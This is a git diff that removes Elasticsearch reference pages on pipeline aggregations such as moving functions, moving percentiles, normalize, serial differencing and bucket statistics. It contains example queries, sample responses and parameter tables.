"moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.stdDev(values, MovingFunctions.unweightedAvg(values))" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -The `avg` parameter must be provided to the standard deviation function because different styles of averages can be computed on the window -(simple, linearly weighted, etc). The various moving averages that are detailed below can be used to calculate the average for the -standard deviation function. - -===== unweightedAvg Function - -The `unweightedAvg` function calculates the sum of all values in the window, then divides by the size of the window. It is effectively -a simple arithmetic mean of the window. The simple moving average does not perform any time-dependent weighting, which means -the values from a `simple` moving average tend to "lag" behind the real data. - -`null` and `NaN` values are ignored; the average is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `NaN` is returned as the result. This means that the count used in the average calculation is count of non-`null`,non-`NaN` -values. 
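To make the pairing of `unweightedAvg` and `stdDev` concrete, here is an illustrative sketch. A population-style standard deviation is assumed; this is not the actual `MovingFunctions` code, and the window values are invented:

[source,python]
--------------------------------------------------
import math

# Illustrative sketch: the standard deviation helper takes the average as an
# argument because the caller chooses which style of average to compute.
def unweighted_avg(values):
    vals = [v for v in values if v is not None and not math.isnan(v)]
    return sum(vals) / len(vals) if vals else float("nan")

def std_dev(values, avg):
    vals = [v for v in values if v is not None and not math.isnan(v)]
    if not vals or math.isnan(avg):
        return 0.0  # documented result for an empty window
    return math.sqrt(sum((v - avg) ** 2 for v in vals) / len(vals))

window = [550.0, 60.0, 375.0]  # invented window of bucket values
print(std_dev(window, unweighted_avg(window)))
--------------------------------------------------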
- -[[unweightedavg-params]] -.`unweightedAvg(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.unweightedAvg(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== linearWeightedAvg Function - -The `linearWeightedAvg` function assigns a linear weighting to points in the series, such that "older" datapoints (e.g. those at -the beginning of the window) contribute a linearly less amount to the total average. The linear weighting helps reduce -the "lag" behind the data's mean, since older points have less influence. - -If the window is empty, or all values are `null`/`NaN`, `NaN` is returned as the result. - -[[linearweightedavg-params]] -.`linearWeightedAvg(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.linearWeightedAvg(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== ewma Function - -The `ewma` function (aka "single-exponential") is similar to the `linearMovAvg` function, -except older data-points become exponentially less important, -rather than linearly less important. The speed at which the importance decays can be controlled with an `alpha` -setting. Small values make the weight decay slowly, which provides greater smoothing and takes into account a larger -portion of the window. Larger values make the weight decay quickly, which reduces the impact of older values on the -moving average. This tends to make the moving average track the data more closely but with less smoothing. - -`null` and `NaN` values are ignored; the average is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `NaN` is returned as the result. This means that the count used in the average calculation is count of non-`null`,non-`NaN` -values. 
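For intuition, the exponential decay described above can be sketched like this. It is an illustrative re-implementation of the documented behavior, not the `MovingFunctions.ewma` source, and the window values are invented:

[source,python]
--------------------------------------------------
import math

# Illustrative exponentially weighted moving average over one window:
# each real value updates the running average by a fraction `alpha`,
# so older values fade away exponentially. Returns NaN if the window
# holds no real values.
def ewma(values, alpha):
    avg = None
    for v in values:
        if v is None or math.isnan(v):
            continue  # ignore gaps, as documented
        avg = v if avg is None else alpha * v + (1 - alpha) * avg
    return float("nan") if avg is None else avg

window = [10.0, 12.0, None, 14.0, 18.0]  # invented window, oldest first
print(ewma(window, 0.3))   # smoother, weights history more heavily
print(ewma(window, 0.8))   # tracks the newest values more closely
--------------------------------------------------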
- -[[ewma-params]] -.`ewma(double[] values, double alpha)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|`alpha` |Exponential decay -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.ewma(values, 0.3)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - - -==== holt Function - -The `holt` function (aka "double exponential") incorporates a second exponential term which -tracks the data's trend. Single exponential does not perform well when the data has an underlying linear trend. The -double exponential model calculates two values internally: a "level" and a "trend". - -The level calculation is similar to `ewma`, and is an exponentially weighted view of the data. The difference is -that the previously smoothed value is used instead of the raw value, which allows it to stay close to the original series. -The trend calculation looks at the difference between the current and last value (e.g. the slope, or trend, of the -smoothed data). The trend value is also exponentially weighted. - -Values are produced by multiplying the level and trend components. - -`null` and `NaN` values are ignored; the average is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `NaN` is returned as the result. This means that the count used in the average calculation is count of non-`null`,non-`NaN` -values. - -[[holt-params]] -.`holt(double[] values, double alpha)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|`alpha` |Level decay value -|`beta` |Trend decay value -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.holt(values, 0.3, 0.1)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -In practice, the `alpha` value behaves very similarly in `holtMovAvg` as `ewmaMovAvg`: small values produce more smoothing -and more lag, while larger values produce closer tracking and less lag. The value of `beta` is often difficult -to see. Small values emphasize long-term trends (such as a constant linear trend in the whole series), while larger -values emphasize short-term trends. - -==== holtWinters Function - -The `holtWinters` function (aka "triple exponential") incorporates a third exponential term which -tracks the seasonal aspect of your data. This aggregation therefore smooths based on three components: "level", "trend" -and "seasonality". - -The level and trend calculation is identical to `holt` The seasonal calculation looks at the difference between -the current point, and the point one period earlier. - -Holt-Winters requires a little more handholding than the other moving averages. You need to specify the "periodicity" -of your data: e.g. 
if your data has cyclic trends every 7 days, you would set `period = 7`. Similarly if there was -a monthly trend, you would set it to `30`. There is currently no periodicity detection, although that is planned -for future enhancements. - -`null` and `NaN` values are ignored; the average is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `NaN` is returned as the result. This means that the count used in the average calculation is count of non-`null`,non-`NaN` -values. - -[[holtwinters-params]] -.`holtWinters(double[] values, double alpha)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|`alpha` |Level decay value -|`beta` |Trend decay value -|`gamma` |Seasonality decay value -|`period` |The periodicity of the data -|`multiplicative` |True if you wish to use multiplicative holt-winters, false to use additive -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "if (values.length > 5*2) {MovingFunctions.holtWinters(values, 0.3, 0.1, 0.1, 5, false)}" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -[WARNING] -====== -Multiplicative Holt-Winters works by dividing each data point by the seasonal value. This is problematic if any of -your data is zero, or if there are gaps in the data (since this results in a divid-by-zero). To combat this, the -`mult` Holt-Winters pads all values by a very small amount (1*10^-10^) so that all values are non-zero. This affects -the result, but only minimally. If your data is non-zero, or you prefer to see `NaN` when zero's are encountered, -you can disable this behavior with `pad: false` -====== - -===== "Cold Start" - -Unfortunately, due to the nature of Holt-Winters, it requires two periods of data to "bootstrap" the algorithm. This -means that your `window` must always be *at least* twice the size of your period. An exception will be thrown if it -isn't. It also means that Holt-Winters will not emit a value for the first `2 * period` buckets; the current algorithm -does not backcast. - -You'll notice in the above example we have an `if ()` statement checking the size of values. This is checking to make sure -we have two periods worth of data (`5 * 2`, where 5 is the period specified in the `holtWintersMovAvg` function) before calling -the holt-winters function. diff --git a/docs/reference/aggregations/pipeline/moving-percentiles-aggregation.asciidoc b/docs/reference/aggregations/pipeline/moving-percentiles-aggregation.asciidoc deleted file mode 100644 index 50b099d8e16..00000000000 --- a/docs/reference/aggregations/pipeline/moving-percentiles-aggregation.asciidoc +++ /dev/null @@ -1,165 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-pipeline-moving-percentiles-aggregation]] -=== Moving percentiles aggregation -++++ -Moving percentiles -++++ - -Given an ordered series of <>, the Moving Percentile aggregation -will slide a window across those percentiles and allow the user to compute the cumulative percentile. - -This is conceptually very similar to the <> pipeline aggregation, -except it works on the percentiles sketches instead of the actual buckets values. 
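Conceptually, the aggregation slides a window across the per-bucket percentile sketches and combines them. As a rough stand-in only, the sketch below pretends each bucket's sketch is the raw sample list it was built from and pools those samples; the real aggregation merges the percentile data structures themselves, and all names and values here are invented:

[source,python]
--------------------------------------------------
# Conceptual sketch only: combine a window of buckets by pooling their
# samples before reading off the requested percentiles. With the default
# shift of 0, the window holds the buckets before the current one.
def moving_percentiles(bucket_samples, window, percents):
    results = []
    for i in range(len(bucket_samples)):
        pooled = sorted(x for b in bucket_samples[max(0, i - window):i] for x in b)
        if not pooled:
            results.append(None)  # nothing before the first bucket
            continue
        # nearest-rank style lookup, for illustration only
        results.append({p: pooled[min(len(pooled) - 1, int(p / 100.0 * len(pooled)))]
                        for p in percents})
    return results

buckets = [[150.0, 200.0, 175.0], [10.0, 50.0], [175.0, 200.0]]  # invented prices
print(moving_percentiles(buckets, window=10, percents=[1.0, 99.0]))
--------------------------------------------------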
- -==== Syntax - -A `moving_percentiles` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "moving_percentiles": { - "buckets_path": "the_percentile", - "window": 10 - } -} --------------------------------------------------- -// NOTCONSOLE - -[[moving-percentiles-params]] -.`moving_percentiles` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |Path to the percentile of interest (see <> for more details |Required | -|`window` |The size of window to "slide" across the histogram. |Required | -|`shift` |<> of window position. |Optional | 0 -|=== - -`moving_percentiles` aggregations must be embedded inside of a `histogram` or `date_histogram` aggregation. They can be -embedded like any other metric aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { <1> - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_percentile": { <2> - "percentiles": { - "field": "price", - "percents": [ 1.0, 99.0 ] - } - }, - "the_movperc": { - "moving_percentiles": { - "buckets_path": "the_percentile", <3> - "window": 10 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> A `date_histogram` named "my_date_histo" is constructed on the "timestamp" field, with one-day intervals -<2> A `percentile` metric is used to calculate the percentiles of a field. -<3> Finally, we specify a `moving_percentiles` aggregation which uses "the_percentile" sketch as its input. - -Moving percentiles are built by first specifying a `histogram` or `date_histogram` over a field. You then add -a percentile metric inside of that histogram. Finally, the `moving_percentiles` is embedded inside the histogram. -The `buckets_path` parameter is then used to "point" at the percentiles aggregation inside of the histogram (see -<> for a description of the syntax for `buckets_path`). - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "my_date_histo": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "the_percentile": { - "values": { - "1.0": 150.0, - "99.0": 200.0 - } - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "the_percentile": { - "values": { - "1.0": 10.0, - "99.0": 50.0 - } - }, - "the_movperc": { - "values": { - "1.0": 150.0, - "99.0": 200.0 - } - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "the_percentile": { - "values": { - "1.0": 175.0, - "99.0": 200.0 - } - }, - "the_movperc": { - "values": { - "1.0": 10.0, - "99.0": 200.0 - } - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -The output format of the `moving_percentiles` aggregation is inherited from the format of the referenced -<> aggregation. - -Moving percentiles pipeline aggregations always run with `skip` gap policy. 
- - -[[moving-percentiles-shift-parameter]] -==== shift parameter - -By default (with `shift = 0`), the window that is offered for calculation is the last `n` values excluding the current bucket. -Increasing `shift` by 1 moves starting window position by `1` to the right. - -- To include current bucket to the window, use `shift = 1`. -- For center alignment (`n / 2` values before and after the current bucket), use `shift = window / 2`. -- For right alignment (`n` values after the current bucket), use `shift = window`. - -If either of window edges moves outside the borders of data series, the window shrinks to include available values only. diff --git a/docs/reference/aggregations/pipeline/normalize-aggregation.asciidoc b/docs/reference/aggregations/pipeline/normalize-aggregation.asciidoc deleted file mode 100644 index 80cc0c3db11..00000000000 --- a/docs/reference/aggregations/pipeline/normalize-aggregation.asciidoc +++ /dev/null @@ -1,185 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-pipeline-normalize-aggregation]] -=== Normalize aggregation -++++ -Normalize -++++ - -A parent pipeline aggregation which calculates the specific normalized/rescaled value for a specific bucket value. -Values that cannot be normalized, will be skipped using the <>. - -==== Syntax - -A `normalize` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "normalize": { - "buckets_path": "normalized", - "method": "percent_of_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[normalize_pipeline-params]] -.`normalize_pipeline` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to normalize (see <> for more details) |Required | -|`method` | The specific <> to apply | Required | -|`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -==== Methods -[[normalize_pipeline-method]] - -The Normalize Aggregation supports multiple methods to transform the bucket values. Each method definition will use -the following original set of bucket values as examples: `[5, 5, 10, 50, 10, 20]`. - -_rescale_0_1_:: - This method rescales the data such that the minimum number is zero, and the maximum number is 1, with the rest normalized - linearly in-between. - - x' = (x - min_x) / (max_x - min_x) - - [0, 0, .1111, 1, .1111, .3333] - -_rescale_0_100_:: - This method rescales the data such that the minimum number is zero, and the maximum number is 100, with the rest normalized - linearly in-between. - - x' = 100 * (x - min_x) / (max_x - min_x) - - [0, 0, 11.11, 100, 11.11, 33.33] - -_percent_of_sum_:: - This method normalizes each value so that it represents a percentage of the total sum it attributes to. - - x' = x / sum_x - - [5%, 5%, 10%, 50%, 10%, 20%] - - -_mean_:: - This method normalizes such that each value is normalized by how much it differs from the average. - - x' = (x - mean_x) / (max_x - min_x) - - [4.63, 4.63, 9.63, 49.63, 9.63, 9.63, 19.63] - -_zscore_:: - This method normalizes such that each value represents how far it is from the mean relative to the standard deviation - - x' = (x - mean_x) / stdev_x - - [-0.68, -0.68, -0.39, 1.94, -0.39, 0.19] - -_softmax_:: - This method normalizes such that each value is exponentiated and relative to the sum of the exponents of the original values. 
- - x' = e^x / sum_e_x - - [2.862E-20, 2.862E-20, 4.248E-18, 0.999, 9.357E-14, 4.248E-18] - - -==== Example - -The following snippet calculates the percent of total sales for each month: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "percent_of_total_sales": { - "normalize": { - "buckets_path": "sales", <1> - "method": "percent_of_sum", <2> - "format": "00.00%" <3> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this normalize aggregation to use the output of the `sales` aggregation for rescaling -<2> `method` sets which rescaling to apply. In this case, `percent_of_sum` will calculate the sales value as a percent of all sales - in the parent bucket -<3> `format` influences how to format the metric as a string using Java's `DecimalFormat` pattern. In this case, multiplying by 100 - and adding a '%' - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - }, - "percent_of_total_sales": { - "value": 0.5583756345177665, - "value_as_string": "55.84%" - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "percent_of_total_sales": { - "value": 0.06091370558375635, - "value_as_string": "06.09%" - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - }, - "percent_of_total_sales": { - "value": 0.38071065989847713, - "value_as_string": "38.07%" - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/percentiles-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/percentiles-bucket-aggregation.asciidoc deleted file mode 100644 index d3a492536ef..00000000000 --- a/docs/reference/aggregations/pipeline/percentiles-bucket-aggregation.asciidoc +++ /dev/null @@ -1,134 +0,0 @@ -[[search-aggregations-pipeline-percentiles-bucket-aggregation]] -=== Percentiles bucket aggregation -++++ -Percentiles bucket -++++ - -A sibling pipeline aggregation which calculates percentiles across all bucket of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. 
- -==== Syntax - -A `percentiles_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "percentiles_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[percentiles-bucket-params]] -.`percentiles_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the percentiles for (see <> for more - details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` -|`format` |format to apply to the output value of this aggregation |Optional | `null` -|`percents` |The list of percentiles to calculate |Optional | `[ 1, 5, 25, 50, 75, 95, 99 ]` -|`keyed` |Flag which returns the range as an hash instead of an array of key-value pairs |Optional | `true` -|=== - -The following snippet calculates the percentiles for the total monthly `sales` buckets: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "percentiles_monthly_sales": { - "percentiles_bucket": { - "buckets_path": "sales_per_month>sales", <1> - "percents": [ 25.0, 50.0, 75.0 ] <2> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this percentiles_bucket aggregation that we want to calculate percentiles for -the `sales` aggregation in the `sales_per_month` date histogram. -<2> `percents` specifies which percentiles we wish to calculate, in this case, the 25th, 50th and 75th percentiles. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "percentiles_monthly_sales": { - "values" : { - "25.0": 375.0, - "50.0": 375.0, - "75.0": 550.0 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -==== Percentiles_bucket implementation - -The Percentile Bucket returns the nearest input data point that is not greater than the requested percentile; it does not -interpolate between data points. - -The percentiles are calculated exactly and is not an approximation (unlike the Percentiles Metric). This means -the implementation maintains an in-memory, sorted list of your data to compute the percentiles, before discarding the -data. You may run into memory pressure issues if you attempt to calculate percentiles over many millions of -data-points in a single `percentiles_bucket`. 
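The selection rule just described can be sketched as follows. The index arithmetic is an assumption chosen to reproduce the example response above; the aggregation's own rounding may differ in edge cases, and this is not its actual code:

[source,python]
--------------------------------------------------
# Illustrative sketch of an exact, non-interpolating percentile lookup over
# the collected bucket values, consistent with the example response above.
def percentiles_bucket(values, percents):
    data = sorted(values)  # the whole dataset is kept in memory and sorted
    results = {}
    for p in percents:
        index = int(p / 100.0 * (len(data) - 1) + 0.5)  # nearest rank, no interpolation
        results[p] = data[index]
    return results

monthly_sales = [550.0, 60.0, 375.0]  # the monthly totals from the example above
print(percentiles_bucket(monthly_sales, [25.0, 50.0, 75.0]))
# {25.0: 375.0, 50.0: 375.0, 75.0: 550.0}
--------------------------------------------------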
diff --git a/docs/reference/aggregations/pipeline/serial-diff-aggregation.asciidoc b/docs/reference/aggregations/pipeline/serial-diff-aggregation.asciidoc deleted file mode 100644 index 9909953d7c3..00000000000 --- a/docs/reference/aggregations/pipeline/serial-diff-aggregation.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[search-aggregations-pipeline-serialdiff-aggregation]] -=== Serial differencing aggregation -++++ -Serial differencing -++++ - -Serial differencing is a technique where values in a time series are subtracted from itself at -different time lags or periods. For example, the datapoint f(x) = f(x~t~) - f(x~t-n~), where n is the period being used. - -A period of 1 is equivalent to a derivative with no time normalization: it is simply the change from one point to the -next. Single periods are useful for removing constant, linear trends. - -Single periods are also useful for transforming data into a stationary series. In this example, the Dow Jones is -plotted over ~250 days. The raw data is not stationary, which would make it difficult to use with some techniques. - -By calculating the first-difference, we de-trend the data (e.g. remove a constant, linear trend). We can see that the -data becomes a stationary series (e.g. the first difference is randomly distributed around zero, and doesn't seem to -exhibit any pattern/behavior). The transformation reveals that the dataset is following a random-walk; the value is the -previous value +/- a random amount. This insight allows selection of further tools for analysis. - -[[serialdiff_dow]] -.Dow Jones plotted and made stationary with first-differencing -image::images/pipeline_serialdiff/dow.png[] - -Larger periods can be used to remove seasonal / cyclic behavior. In this example, a population of lemmings was -synthetically generated with a sine wave + constant linear trend + random noise. The sine wave has a period of 30 days. - -The first-difference removes the constant trend, leaving just a sine wave. The 30th-difference is then applied to the -first-difference to remove the cyclic behavior, leaving a stationary series which is amenable to other analysis. - -[[serialdiff_lemmings]] -.Lemmings data plotted made stationary with 1st and 30th difference -image::images/pipeline_serialdiff/lemmings.png[] - - - -==== Syntax - -A `serial_diff` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "serial_diff": { - "buckets_path": "the_sum", - "lag": "7" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[serial-diff-params]] -.`serial_diff` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |Path to the metric of interest (see <> for more details |Required | -|`lag` |The historical bucket to subtract from the current value. E.g. a lag of 7 will subtract the current value from - the value 7 buckets ago. Must be a positive, non-zero integer |Optional |`1` -|`gap_policy` |Determines what should happen when a gap in the data is encountered. 
|Optional |`insert_zero` -|`format` |Format to apply to the output value of this aggregation |Optional | `null` -|=== - -`serial_diff` aggregations must be embedded inside of a `histogram` or `date_histogram` aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { <1> - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "the_sum": { - "sum": { - "field": "lemmings" <2> - } - }, - "thirtieth_difference": { - "serial_diff": { <3> - "buckets_path": "the_sum", - "lag" : 30 - } - } - } - } - } -} --------------------------------------------------- - -<1> A `date_histogram` named "my_date_histo" is constructed on the "timestamp" field, with one-day intervals -<2> A `sum` metric is used to calculate the sum of a field. This could be any metric (sum, min, max, etc) -<3> Finally, we specify a `serial_diff` aggregation which uses "the_sum" metric as its input. - -Serial differences are built by first specifying a `histogram` or `date_histogram` over a field. You can then optionally -add normal metrics, such as a `sum`, inside of that histogram. Finally, the `serial_diff` is embedded inside the histogram. -The `buckets_path` parameter is then used to "point" at one of the sibling metrics inside of the histogram (see -<> for a description of the syntax for `buckets_path`. diff --git a/docs/reference/aggregations/pipeline/stats-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/stats-bucket-aggregation.asciidoc deleted file mode 100644 index ba72b2533ea..00000000000 --- a/docs/reference/aggregations/pipeline/stats-bucket-aggregation.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[search-aggregations-pipeline-stats-bucket-aggregation]] -=== Stats bucket aggregation -++++ -Stats bucket -++++ - -A sibling pipeline aggregation which calculates a variety of stats across all bucket of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. - -==== Syntax - -A `stats_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "stats_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[stats-bucket-params]] -.`stats_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to calculate stats for (see <> for more - details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` -|`format` |format to apply to the output value of this aggregation |Optional | `null` -|=== - -The following snippet calculates the stats for monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "stats_monthly_sales": { - "stats_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `bucket_paths` instructs this `stats_bucket` aggregation that we want the calculate stats for the `sales` aggregation in the -`sales_per_month` date histogram. 
- -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "stats_monthly_sales": { - "count": 3, - "min": 60.0, - "max": 550.0, - "avg": 328.3333333333333, - "sum": 985.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/sum-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/sum-bucket-aggregation.asciidoc deleted file mode 100644 index e0075471772..00000000000 --- a/docs/reference/aggregations/pipeline/sum-bucket-aggregation.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[[search-aggregations-pipeline-sum-bucket-aggregation]] -=== Sum bucket aggregation -++++ -Sum bucket -++++ - - -A sibling pipeline aggregation which calculates the sum across all buckets of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. - -==== Syntax - -A `sum_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "sum_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[sum-bucket-params]] -.`sum_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the sum for (see <> for more - details) |Required | - |`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` - |`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the sum of all the total monthly `sales` buckets: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "sum_monthly_sales": { - "sum_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this sum_bucket aggregation that we want the sum of the `sales` aggregation in the -`sales_per_month` date histogram. 
